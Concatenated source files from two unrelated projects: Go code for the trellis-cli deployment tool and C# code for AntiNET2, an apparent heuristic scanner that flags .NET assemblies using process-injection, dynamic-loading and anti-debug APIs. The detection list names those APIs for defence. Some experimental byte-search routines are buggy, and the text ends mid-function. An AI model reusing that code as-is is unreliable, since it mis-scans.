input.WriteString(tc.Last)
defer testAutocomplete(t, input.String())()
// Setup the output so that we can read it. We don't need to
// reset os.Stdout because testAutocomplete will do that for us.
r, w, err := os.Pipe()
if err != nil {
t.Fatalf("err: %s", err)
}
defer r.Close() // Only defer reader since writer is closed below
os.Stdout = w
// Run
exitCode, err := cli.Run()
w.Close()
if err != nil {
t.Fatalf("err: %s", err)
}
if exitCode != 0 {
t.Fatalf("bad: %d", exitCode)
}
// Copy the output and get the autocompletions. We trim the last
// element if we have one since we usually output a final newline
// which results in a blank.
var outBuf bytes.Buffer
io.Copy(&outBuf, r)
actual := strings.Split(outBuf.String(), "\n")
if len(actual) > 0 {
actual = actual[:len(actual)-1]
}
if len(actual) == 0 {
// If we have no elements left, make the value nil since
// this is what we use in tests.
actual = nil
}
sort.Strings(actual)
sort.Strings(tc.Expected)
if !reflect.DeepEqual(actual, tc.Expected) {
t.Fatalf("bad:\n\n%#v\n\n%#v", actual, tc.Expected)
}
})
}
}
// testAutocomplete sets up the environment to behave like a <tab> was
// pressed in a shell to autocomplete a command.
func testAutocomplete(t *testing.T, input string) func() {
// This env var is used to trigger autocomplete
os.Setenv(envComplete, input)
// Change stdout/stderr since the autocompleter writes directly to them.
oldStdout := os.Stdout
oldStderr := os.Stderr
r, w, err := os.Pipe()
if err != nil {
t.Fatalf("err: %s", err)
}
os.Stdout = w
os.Stderr = w
return func() {
// Reset our env
os.Unsetenv(envComplete)
// Reset stdout, stderr
os.Stdout = oldStdout
os.Stderr = oldStderr
// Close our pipe
r.Close()
w.Close()
}
}
<|start_filename|>cmd/rollback.go<|end_filename|>
package cmd
import (
"flag"
"fmt"
"strings"
"github.com/mitchellh/cli"
"github.com/posener/complete"
"github.com/roots/trellis-cli/trellis"
)
func NewRollbackCommand(ui cli.Ui, trellis *trellis.Trellis) *RollbackCommand {
c := &RollbackCommand{UI: ui, Trellis: trellis, playbook: &Playbook{ui: ui}}
c.init()
return c
}
type RollbackCommand struct {
UI cli.Ui
flags *flag.FlagSet
release string
Trellis *trellis.Trellis
playbook PlaybookRunner
verbose bool
}
func (c *RollbackCommand) init() {
c.flags = flag.NewFlagSet("", flag.ContinueOnError)
c.flags.Usage = func() { c.UI.Info(c.Help()) }
c.flags.StringVar(&c.release, "release", "", "Release to rollback instead of latest one")
c.flags.BoolVar(&c.verbose, "verbose", false, "Enable Ansible's verbose mode")
}
func (c *RollbackCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.Trellis.CheckVirtualenv(c.UI)
if err := c.flags.Parse(args); err != nil {
return 1
}
args = c.flags.Args()
commandArgumentValidator := &CommandArgumentValidator{required: 1, optional: 1}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
environment := args[0]
environmentErr := c.Trellis.ValidateEnvironment(environment)
if environmentErr != nil {
c.UI.Error(environmentErr.Error())
return 1
}
siteNameArg := c.flags.Arg(1)
siteName, siteNameErr := c.Trellis.FindSiteNameFromEnvironment(environment, siteNameArg)
if siteNameErr != nil {
c.UI.Error(siteNameErr.Error())
return 1
}
extraVars := fmt.Sprintf("env=%s site=%s", environment, siteName)
if len(c.release) > 0 {
extraVars = fmt.Sprintf("%s release=%s", extraVars, c.release)
}
playbookArgs := []string{"-e", extraVars}
if c.verbose {
playbookArgs = append(playbookArgs, "-vvvv")
}
c.playbook.SetRoot(c.Trellis.Path)
if err := c.playbook.Run("rollback.yml", playbookArgs); err != nil {
c.UI.Error(err.Error())
return 1
}
return 0
}
func (c *RollbackCommand) Synopsis() string {
return "Rollback the last deploy of the site on the specified environment"
}
func (c *RollbackCommand) Help() string {
helpText := `
Usage: trellis rollback [options] ENVIRONMENT [SITE]
Performs a rollback (revert) of the last deploy for the site specified.
Rollback the latest deploy on the default site:
$ trellis rollback production
Rollback the latest deploy for a specific site:
$ trellis rollback production example.com
Rollback a specific release:
$ trellis rollback --release=12345678901234 production example.com
Arguments:
ENVIRONMENT Name of environment (ie: production)
SITE Name of the site (ie: example.com)
Options:
--release Name of release to rollback instead of latest
--verbose Enable Ansible's verbose mode
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
func (c *RollbackCommand) AutocompleteArgs() complete.Predictor {
return c.Trellis.AutocompleteSite()
}
func (c *RollbackCommand) AutocompleteFlags() complete.Flags {
return complete.Flags{
"--release": complete.PredictNothing,
"--verbose": complete.PredictNothing,
}
}
<|start_filename|>cmd/cmd_test.go<|end_filename|>
package cmd
import (
"fmt"
"os"
"os/exec"
"strings"
"testing"
"github.com/mitchellh/cli"
)
func mockExecCommand(command string, args []string, ui cli.Ui) *exec.Cmd {
cs := []string{"-test.run=TestHelperProcess", "--", command}
cs = append(cs, args...)
cmd := exec.Command(os.Args[0], cs...)
cmd.Stderr = &UiErrorWriter{ui}
cmd.Stdout = &cli.UiWriter{ui}
cmd.Env = []string{"GO_WANT_HELPER_PROCESS=1"}
return cmd
}
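// MockExec replaces the package's exec command constructors with
// mockExecCommand, which re-runs the test binary so TestHelperProcess handles
// the call instead of a real external command. The returned func restores the
// original constructors.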
func MockExec(t *testing.T) func() {
t.Helper()
execCommandWithOutput = mockExecCommand
execCommand = mockExecCommand
return func() {
execCommandWithOutput = CommandExecWithOutput
execCommand = CommandExec
}
}
func TestHelperProcess(t *testing.T) {
if os.Getenv("GO_WANT_HELPER_PROCESS") != "1" {
return
}
fmt.Fprintf(os.Stdout, strings.Join(os.Args[3:], " "))
os.Exit(0)
}
type MockCommand struct {
cmd string
args string
env []string
}
<|start_filename|>trellis/complete.go<|end_filename|>
package trellis
import (
"github.com/posener/complete"
)
func (t *Trellis) AutocompleteSite() complete.Predictor {
return t.PredictSite()
}
func (t *Trellis) AutocompleteEnvironment() complete.Predictor {
return t.PredictEnvironment()
}
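// PredictSite completes an environment name for the first argument and, once
// an environment has been completed, the site names defined for that
// environment.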
func (t *Trellis) PredictSite() complete.PredictFunc {
return func(args complete.Args) []string {
if err := t.LoadProject(); err != nil {
return []string{}
}
switch len(args.Completed) {
case 0:
return t.EnvironmentNames()
case 1:
return t.SiteNamesFromEnvironment(args.LastCompleted)
default:
return []string{}
}
}
}
func (t *Trellis) PredictEnvironment() complete.PredictFunc {
return func(args complete.Args) []string {
if err := t.LoadProject(); err != nil {
return []string{}
}
switch len(args.Completed) {
case 0:
return t.EnvironmentNames()
default:
return []string{}
}
}
}
<|start_filename|>cmd/alias.go<|end_filename|>
package cmd
import (
_ "embed"
"flag"
"fmt"
"github.com/fatih/color"
"github.com/mitchellh/cli"
"github.com/posener/complete"
"github.com/roots/trellis-cli/trellis"
"io/ioutil"
"os"
"path/filepath"
"strings"
)
type AliasCommand struct {
UI cli.Ui
flags *flag.FlagSet
Trellis *trellis.Trellis
local string
aliasPlaybook PlaybookRunner
aliasCopyPlaybook PlaybookRunner
}
//go:embed files/playbooks/alias.yml
var aliasYml string
const aliasYmlJ2 = `
@{{ env }}:
ssh: "{{ web_user }}@{{ ansible_host }}:{{ ansible_port | default('22') }}"
path: "{{ project_root | default(www_root + '/' + item.key) | regex_replace('^~\/','') }}/{{ item.current_path | default('current') }}/web/wp"
`
//go:embed files/playbooks/alias_copy.yml
var aliasCopyYml string
func NewAliasCommand(ui cli.Ui, trellis *trellis.Trellis) *AliasCommand {
aliasPlaybook := &AdHocPlaybook{
files: map[string]string{
"alias.yml": aliasYml,
"alias.yml.j2": strings.TrimSpace(aliasYmlJ2) + "\n",
},
Playbook: Playbook{
ui: ui,
},
}
aliasCopyPlaybook := &AdHocPlaybook{
files: map[string]string{
"alias-copy.yml": aliasCopyYml,
},
Playbook: Playbook{
ui: ui,
},
}
c := &AliasCommand{UI: ui, Trellis: trellis, aliasPlaybook: aliasPlaybook, aliasCopyPlaybook: aliasCopyPlaybook}
c.init()
return c
}
func (c *AliasCommand) init() {
c.flags = flag.NewFlagSet("", flag.ContinueOnError)
c.flags.Usage = func() { c.UI.Info(c.Help()) }
c.flags.StringVar(&c.local, "local", "development", "local environment name, default: development")
}
func (c *AliasCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
if err := c.flags.Parse(args); err != nil {
return 1
}
args = c.flags.Args()
commandArgumentValidator := &CommandArgumentValidator{required: 0, optional: 0}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
environments := c.Trellis.EnvironmentNames()
var remoteEnvironments []string
for _, environment := range environments {
if environment != c.local {
remoteEnvironments = append(remoteEnvironments, environment)
}
}
tempDir, tempDirErr := ioutil.TempDir("", "trellis-alias-")
if tempDirErr != nil {
c.UI.Error(tempDirErr.Error())
return 1
}
defer os.RemoveAll(tempDir)
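// Run the alias playbook once per remote environment; each run renders an
// "<environment>.yml.part" fragment into the temp dir, which is read back
// and concatenated below.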
c.aliasPlaybook.SetRoot(c.Trellis.Path)
for _, environment := range remoteEnvironments {
args := []string{
"-vvv",
"-e", "env=" + environment,
"-e", "trellis_alias_j2=alias.yml.j2",
"-e", "trellis_alias_temp_dir=" + tempDir,
}
if err := c.aliasPlaybook.Run("alias.yml", args); err != nil {
c.UI.Error(fmt.Sprintf("Error running ansible-playbook alias.yml: %s", err))
return 1
}
}
combined := ""
for _, environment := range remoteEnvironments {
part, err := ioutil.ReadFile(filepath.Join(tempDir, environment+".yml.part"))
if err != nil {
c.UI.Error(err.Error())
return 1
}
combined = combined + string(part)
}
combinedYmlPath := filepath.Join(tempDir, "/combined.yml")
writeFileErr := ioutil.WriteFile(combinedYmlPath, []byte(combined), 0644)
if writeFileErr != nil {
c.UI.Error(writeFileErr.Error())
return 1
}
c.aliasCopyPlaybook.SetRoot(c.Trellis.Path)
if err := c.aliasCopyPlaybook.Run("alias-copy.yml", []string{"-e", "env=" + c.local, "-e", "trellis_alias_combined=" + combinedYmlPath}); err != nil {
c.UI.Error(fmt.Sprintf("Error running ansible-playbook alias-copy.yml: %s", err))
return 1
}
c.UI.Info(color.GreenString("✓ wp-cli.trellis-alias.yml generated"))
message := `
Action Required: Add these lines into wp-cli.yml or wp-cli.local.yml
_:
inherit: wp-cli.trellis-alias.yml
`
c.UI.Info(strings.TrimSpace(message))
return 0
}
func (c *AliasCommand) Synopsis() string {
return "Generate WP CLI aliases for remote environments"
}
func (c *AliasCommand) Help() string {
helpText := `
Usage: trellis alias [options]
Generate WP CLI aliases for remote environments
Options:
--local (default: development) Local environment name
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
func (c *AliasCommand) AutocompleteFlags() complete.Flags {
return complete.Flags{
"--local": complete.PredictNothing,
}
}
<|start_filename|>AntiNETCLI/Program.cs<|end_filename|>
using AntiNET2;
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers;
using AntiNET2.Core.Providers.Database;
using AntiNET2.Core.Providers.DetectionEngines.Managed;
using AntiNET2.Core.Providers.DetectionEngines.Native;
using dnlib.DotNet;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNETCLI
{
class Program
{
static void Main(string[] args)
{
Stopwatch sw = new Stopwatch();
Console.Title = "AntiNET - \"False positive? Never!!1\"";
// Trigger the db loading because it'll be counted in the time otherwise :s
if (AntiNET2.Core.Providers.Database.DetectionDatabase.Calls == null)
{
}
//AddDets();
int totalDetections = 0;
sw.Start();
List<Detection> TotalDetections = Scanner.Scan(args[0], out totalDetections);
sw.Stop();
Console.WriteLine("Total Detection: {0}", totalDetections);
/*var grouped = TotalDetections.GroupBy(x => x.DetectionType).ToDictionary(x => x.Key);
foreach (var pair in grouped)
{
foreach (var x in pair.Value)
{
x.DetectionReasons.ForEach(y => Console.WriteLine(y));
}
}*/
// When you try to code, but can't, and then try half linq it...
// :'(
var grouped = TotalDetections.GroupBy(x => x.DetectionType).ToDictionary(x => x.Key);
foreach (var pair in grouped)
{
foreach (var x in pair.Value)
{
var z = x.DetectionReasons.GroupBy(a => a.ReasonType).ToDictionary(a => a.Key);
foreach (var p2 in z)
{
Console.WriteLine(p2.Key);
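// Collapse duplicate reason messages and print how many times each
// occurred under this reason type.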
Dictionary<string, int> counts = new Dictionary<string, int>();
foreach (var x2 in p2.Value)
{
if (counts.ContainsKey(x2.Message))
{
counts[x2.Message]++;
}
else
{
counts.Add(x2.Message, 1);
}
}
foreach (var b in counts)
{
Console.WriteLine("\t{0}x {1}", b.Value, b.Key);
}
}
}
}
Console.WriteLine("Total time taken for scanning: {0}", sw.Elapsed.TotalSeconds);
Console.ReadKey();
}
static void AddDets()
{
PInvokeEntry p = new PInvokeEntry()
{
Category = "Dynamic Calls",
Description = "Get Process Address",
Trigger = "GetProcAddress",
Tag = "DynCalls"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Memory",
Description = "Read Process Memory",
Trigger = "ReadProcessMemory",
Tag = "Mem"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Memory",
Description = "Write Process Memory",
Trigger = "WriteProcessMemory",
Tag = "Mem"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Thread",
Description = "Resume Thread",
Trigger = "ResumeThread",
Tag = "Threads"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Process",
Description = "Create new process",
Trigger = "CreateProcess",
Tag = "Procs"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Process",
Description = "Open process",
Trigger = "OpenProcess",
Tag = "Procs"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Memory",
Description = "Protect Memory",
Trigger = "VirtualProtect",
Tag = "Mem"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Memory",
Description = "Allocate Memory",
Trigger = "VirtualAlloc",
Tag = "Mem"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Process",
Description = "Terminate process",
Trigger = "TerminateProcess",
Tag = "Procs"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Anti-Debug",
Description = "Output to debugger",
Trigger = "OutputDebugString",
Tag = "Debug"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Anti-Debug",
Description = "Check if debugger present",
Trigger = "IsDebuggerPresent",
Tag = "Debug"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Process",
Description = "Set Critical Process",
Trigger = "RtlSetProcessIsCritical",
Tag = "Procs"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Dynamic Calls",
Description = "Load External Library",
Trigger = "LoadLibrary",
Tag = "DynCalls"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Thread",
Description = "Set thread context",
Trigger = "SetThreadContext",
Tag = "Threads"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Thread",
Description = "Set thread context x64",
Trigger = "Wow64SetThreadContext",
Tag = "Threads"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Hook",
Description = "Low level Windows Hook",
Trigger = "SetWindowsHook",
Tag = "Hooks"
};
DetectionDatabase.AddDetection(p);
ReflectionEntry r = new ReflectionEntry()
{
Trigger = "System.AppDomain::Load",
Description = "Loading Assembly (Appdomain)",
Category = "Load",
Tag = "Load"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::Load",
Description = "Loading Assembly",
Category = "Load",
Tag = "Load"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Runtime.CompilerServices.RuntimeHelpers",
Description = "Loading Assembly by Invoke (RuntimeHelpers)",
Category = "Load",
Tag = "Load"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::get_EntryPoint",
Description = "Getting Assembly EntryPoint",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.MethodBase::Invoke",
Description = "Invoking method with MethodBase",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Type::InvokeMember",
Description = "Invoking method with Type.InvokeMember",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "Microsoft.VisualBasic.CompilerServices.NewLateBinding::",
Description = "Late binding to invoke data",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "Microsoft.VisualBasic.CompilerServices.Operators::OrObject",
Description = "Or Object is used with NewLateBinding",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Module::ResolveSignature",
Description = "Resolve signature to byte array (store data)",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Module::ResolveMethod",
Description = "Resolve a method from MD Token",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Type::GetMethod",
Description = "Gets Method(s) from a type",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Module::GetTypes",
Description = "Gets Type(s) from a Module",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Emit.OpCodes",
Description = "Initializing CIL related data",
Category = "Dynamic",
Tag = "Dynamic"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Emit.ILGenerator",
Description = "Using IL Generator",
Category = "Dynamic",
Tag = "Dynamic"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Runtime.InteropServices.Marshal::Alloc",
Description = "Marshal Memory Allocation",
Category = "Dynamic",
Tag = "Dynamic"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Runtime.InteropServices.GCHandle::Alloc",
Description = "GC Handle Allocation",
Category = "Dynamic",
Tag = "Dynamic"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Resources.ResourceManager::.ctor",
Description = "Initializing ResourceManager",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Resources.ResourceManager::GetObject",
Description = "Getting Object from Resource Manager",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::GetManifestResource",
Description = "Getting Resource from Assembly",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::GetManifestResource",
Description = "Getting Resource from Assembly",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::GetManifestResourceNames",
Description = "Getting Resource Names from Assembly",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
}
}
}
<|start_filename|>AntiNET2/Core/Models/AssemblySettings.cs<|end_filename|>
using dnlib.DotNet;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
public class AssemblySettings
{
public ModuleDefMD Module { get; set; }
public PEImage NativeImage { get; set; }
public List<Detection> TotalDetections { get; set; } = new List<Detection>();
public void AddDetection(string type, Reason r)
{
var typeDetection = TotalDetections.Where(x => x.DetectionType == type).FirstOrDefault();
if (typeDetection == null)
{
TotalDetections.Add(new Detection() { DetectionType = type, DetectionReasons = new List<Reason>() { r }, TotalDetections = 1 });
}
else
{
typeDetection.DetectionReasons.Add(r);
typeDetection.TotalDetections++;
}
}
}
}
<|start_filename|>AntiNET2/Core/Extensions/ModuleExtensions.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Extensions
{
class ModuleExtensions
{
}
}
<|start_filename|>AntiNET2/Core/Models/Reason.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
public class Reason
{
public string ReasonType { get; }
public string Message { get; }
public Reason(string type, string msg)
{
ReasonType = type;
Message = msg;
}
public override string ToString()
{
return string.Format("{0} - {1}", ReasonType, Message);
}
}
}
<|start_filename|>AntiNET2/Core/Extensions/ByteArrayExtensions.cs<|end_filename|>
using AntiNET2.Core.Helpers;
using AntiNET2.Core.Models;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Extensions
{
public static class ByteArrayExtensions
{
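// Scans the first bytes of the array for well-known magic numbers
// (GZip, PKZip, RAR, MZ/EXE), records a detection reason for each match,
// and returns the number of matches found.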
public static int SigDetection(this byte[] array, AssemblySettings _asm, string type)
{
string singular = type;
if (type.EndsWith("s"))
{
singular = type.Remove(type.Length - 1); // strip the trailing "s"
}
int d = 0;
// GZip
if (array[0] == 0x1f && array[1] == 0x8b)
{
_asm.AddDetection(type, new Reason(type, singular + " has GZip magic number. Could be malicious packed content."));
d++;
}
// Pkzip .zip
if (array[0] == 0x50 && array[1] == 0x4b && array[2] == 0x03 && array[3] == 0x04)
{
_asm.AddDetection(type, new Reason(type, singular + " has PKZip magic number. Could be malicious packed content."));
d++;
}
// Rar
if (array[0] == 0x52 && array[1] == 0x61 && array[2] == 0x72 && array[3] == 0x21 && array[4] == 0x1A && array[5] == 0x07 && array[6] == 0x00)
{
_asm.AddDetection(type, new Reason(type, singular + " has RAR magic number. Could be malicious packed content."));
d++;
}
// Exe
if (array[0] == 0x4D && array[1] == 0x5A)
{
_asm.AddDetection(type, new Reason(type, singular + " has EXE magic number. Could be malicious content."));
d++;
}
return d;
}
public static long IndexOf(this byte[] file, string sig)
{
return ByteScan.GetIndexOfSig(file, sig);
}
#region Testing Index Of
public static unsafe long IndexOf(this byte[] haystack, byte[] needle, long startOffset = 0)
{
fixed (byte* h = haystack) fixed (byte* n = needle)
{
for (byte* hNext = h + startOffset, hEnd = h + haystack.LongLength + 1 - needle.LongLength, nEnd = n + needle.LongLength; hNext < hEnd; hNext++)
for (byte* hInc = hNext, nInc = n; *nInc == *hInc; hInc++)
if (++nInc == nEnd)
return hNext - h;
return -1;
}
}
// string like
// 4D 5A 9? 00 03 is sig
// Hex is 2 chars, so need to work on that
public static long IndexOfTest(this byte[] search, string sig)
{
string[] sigParts = sig.Split(' ');
int count = search.Length - sigParts.Length + 1; // the signature is sigParts.Length bytes long
for (int i = 0; i < count; i++)
{
// Problem with this is that it will not work if the first part contains ?
/*if (search[i].ToString("X2") != sigParts[0])
{
continue;
}*/
int j = 0;
for (int a = 0; a < sigParts.Length; a++)
{
string part = sigParts[a];
string testMatch = search[i + a].ToString("X2");
if (testMatch == part || part == "??")
{
j++;
continue;
}
if (part[0] == '?')
{
if (testMatch[1] == part[1])
j++;
}
else if (part[1] == '?')
{
if (testMatch[0] == part[0])
j++;
}
else
{
// No match, break
break;
}
}
if (j == sigParts.Length)
return i;
}
return -1;
}
// Credits to github.com/BahNahNah
// Slower, sadly
public static unsafe long IndexOfTest2(this byte[] search, string sig)
{
var pattern = sig.Split(' ').Select(x =>
{
if (x == "??")
return '?';
return (char)Convert.ToByte(x, 16);
}).ToArray();
fixed (byte* scrArrayPtr = &search[0])
{
var scrEnum = scrArrayPtr;
for (var end = (scrArrayPtr + (search.Length - sig.Length + 1)); scrEnum <= end; scrEnum++)
{
bool found = true;
fixed (char* mPtr = &pattern[0])
{
var mEnum = mPtr;
for (var mEnd = mPtr + pattern.Length; mEnum != mEnd; mEnum++)
{
if (*mEnum == '?')
{
continue;
}
string left = (*mEnum).ToString();
string right = (*scrEnum).ToString("X");
if (left != right)
//if (*(byte*)mEnum != *scrEnum)
{
found = false;
break;
}
}
}
if (found)
return (int)(scrEnum - scrArrayPtr);
scrEnum++;
}
}
return -1;
}
// Credits to github.com/BahNahNah
static unsafe int GetIndexOfScan(byte[] search, byte[] pattern, string match)
{
if (search.Length == 0 || pattern.Length != match.Length || pattern.Length == 0)
return 0;
fixed (byte* scrArrayPtr = &search[0])
{
var scrEnum = scrArrayPtr;
var end = (scrArrayPtr + (search.Length - pattern.Length + 1));
while (scrEnum != end)
{
bool found = true;
for (int pIndex = 0; pIndex < pattern.Length; pIndex++)
{
if (match[pIndex] != '?')
{
if (*(scrEnum + pIndex) != pattern[pIndex])
{
found = false;
break;
}
}
}
if (found)
return (int)(scrEnum - scrArrayPtr);
scrEnum++;
}
}
return -1;
}
#endregion
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Managed/ReflectionDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.DetectionEngines.Managed
{
public class ReflectionDetection : IDetectionProcess
{
public AssemblySettings _asm;
public int Detect(AssemblySettings asm)
{
_asm = asm;
int d = 0;
foreach (TypeDef td in asm.Module.GetTypes())
{
foreach (MethodDef md in td.Methods)
{
if (!md.HasBody)
continue;
d += ProcessMethod(md);
}
}
return d;
}
private int ProcessMethod(MethodDef md)
{
int d = 0;
foreach (Instruction inst in md.Body.Instructions)
{
if (inst.OpCode == OpCodes.Calli)
{
// You shouldn't ever come across calli when an obfuscator isn't present... no?
_asm.AddDetection("Call", new Reason("Call", "Calli Present, could be a sign of hiding behind an obfuscator"));
d++;
}
if (inst.OpCode != OpCodes.Call && inst.OpCode != OpCodes.Callvirt)
{
continue;
}
foreach (ReflectionEntry callEntry in DetectionDatabase.Calls)
{
if (inst.ToString().ToLower().Contains(callEntry.Trigger.ToLower()))
{
_asm.AddDetection(callEntry.Category, new Reason(callEntry.Category, callEntry.Description));
d++;
}
}
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Native/SectionDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.DetectionEngines.Native
{
public class SectionDetection : IDetectionProcess
{
private PEImage mod;
public int Detect(AssemblySettings asm)
{
int d = 0;
mod = asm.NativeImage;
// Check for starting with .
// Check for only top section headers
// .rsrc, .text, .data, .rdata, .reloc, .idata, .tls, .bss
foreach (var sect in mod.ImageSectionHeaders)
{
string dispName = sect.DisplayName;
uint attrs = sect.Characteristics;
if (!dispName.StartsWith("."))
{
asm.AddDetection("Sections", new Reason("Sections", string.Format("Section {0} does not start with a dot. Could be invalid section.", dispName)));
d++;
}
bool hasInvalidAttrs = false;
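// Compare against the section Characteristics normally emitted for each
// standard section (e.g. .text = CODE | MEM_EXECUTE | MEM_READ = 0x60000020).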
switch (dispName)
{
case ".text":
if (attrs != 0x60000020)
{
hasInvalidAttrs = true;
}
break;
case ".rsrc":
case ".rdata":
if (attrs != 0x40000040)
{
hasInvalidAttrs = true;
}
break;
case ".idata":
case ".data":
if (attrs != 0xC0000040)
{
hasInvalidAttrs = true;
}
break;
case ".reloc":
if (attrs != 0x42000040)
{
hasInvalidAttrs = true;
}
break;
case ".bss":
if (attrs != 0xC0000080)
{
hasInvalidAttrs = true;
}
break;
default:
asm.AddDetection("Sections", new Reason("Sections", string.Format("Section {0} is not a common section name. Could contain malicious content.", dispName)));
d++;
break;
}
if (hasInvalidAttrs)
{
asm.AddDetection("Sections", new Reason("Sections", string.Format("Section {0} does not have the correct attributes. Could be spoofed.", dispName)));
d++;
}
}
return d;
}
}
}
<|start_filename|>AntiNET2/Core/Models/Detection.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
public class Detection
{
public string DetectionType = string.Empty;
public int TotalDetections = 0;
public List<Reason> DetectionReasons = new List<Reason>();
}
}
<|start_filename|>AntiNET2/Core/Providers/DetectionEngines/Managed/PInvokeDetection.cs<|end_filename|>
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers.Database;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Providers.DetectionEngines.Managed
{
public class PInvokeDetection : IDetectionProcess
{
public AssemblySettings _asm;
private List<string> commonUsed = new List<string>() { "kernel32.dll", "gdi32.dll", "user32.dll", "mscoree.dll" };
public int Detect(AssemblySettings asm)
{
_asm = asm;
int d = 0;
foreach (TypeDef td in asm.Module.GetTypes())
{
foreach (MethodDef md in td.Methods)
{
if (!md.IsPinvokeImpl)
continue;
d += ProcessMethod(md);
}
}
return d;
}
private int ProcessMethod(MethodDef md)
{
int d = 0;
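// A P/Invoke into a DLL outside the common Windows set is flagged and the
// method is not checked further; otherwise the imported name is matched
// against the known native triggers from the detection database.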
if (!commonUsed.Contains(md.ImplMap.Module.Name.ToString()))
{
